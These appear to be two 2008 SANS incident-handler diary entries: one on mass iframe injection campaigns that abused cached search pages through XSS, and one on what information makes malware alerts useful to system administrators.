The Other iframe attack
A lot of readers are sending in this link from Dancho Danchev's fabulous blog thinking it's linked to the 2117966.net campaign: http://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html
We're also getting this sent in from McAfee's Avert Labs blog: http://www.avertlabs.com/research/blog/index.php/2008/03/13/follow-up-to-yesterdays-mass-hack-attack/
The 2117966.net campaign affected approximately 13,800 ASP pages. No php pages.
This other attack is reported to have affected around 200,000 phpBB pages.
It's a bigger attack and very important, you should read Dancho's blog, it has IP addresses and domains to look for in your logs as well as what traffic an infected system will generate.
If you're a website administrator, also take a close read of his 04-MAR-2008 entry: http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html
Pay particular attention to how they're inserting the code into the site (from Dancho's Blog):
"(The sites) themselves aren't compromised, their SEO practices of locally caching any search queries submitted are abused. Basically, whenever the malicious attacker is feeding the search engine with popular quaries, the sites are caching the search results, so when the malicious party is also searching for the IFRAME in an "loadable state" next to the keyword, it loads. Therefore, relying on the high page ranks of both sites, the probability to have the cached pages with the popular key words easy to find on the major search engines, with the now "creative" combination of the embedded IFRAME, becomes a reality if you even take a modest sample, mostly names."
This is important. It's not obvious to me how to fix the problem-- I'm hoping that someone can explain this better.
The writeup at finjan is more readable to me: http://www.finjan.com/MCRCblog.aspx?EntryId=1905
So we have massive XSS exploitation at work here.
Update: added finjan link that identifies the compromise vector as XSS
Making Intelligence Actionable
As demonstrated in the recent iframe attacks, a lot of people knew that something was going on. The challenge is how to collect all of that information and present it in a way that the community finds useful.
The first step in making information useful is to identify your target audience. For today’s example our target audience is going to be system and network administrators (since this is for SANS, that makes a logical choice, but other potential target audiences would be IT management, or security researchers.)
Now that the audience it defined, it’s time to collect what questions they really need answered when there is an ongoing malware campaign. What do network and system administrators need to know?
- How to block the attack—avoiding trouble is always preferred, and stopping the bleeding should be one of the early steps.
- What the attack attempt looks like—malicious domains, IDS signatures, etc.
- What it exploits—what vulnerability does it exploit? Is it a social-engineering attack?
- What a successful attack looks like—for some environments, they may see hundreds of attack attempts, how do they know if they have hundreds of victims to clean up, or do they have hundreds of near-misses?
- Is AV effective? If so, when was it effective?
- Purpose of the attack—this is helpful for prioritizing the response
- How to protect the browsing community from compromise
- How to protect the server community from amplifying the attack
I hope to keep these questions in mind when writing up alerts for the Handler’s diary. Once I have Actionable as a repeatable process, I’ll work more on Timely.
Comments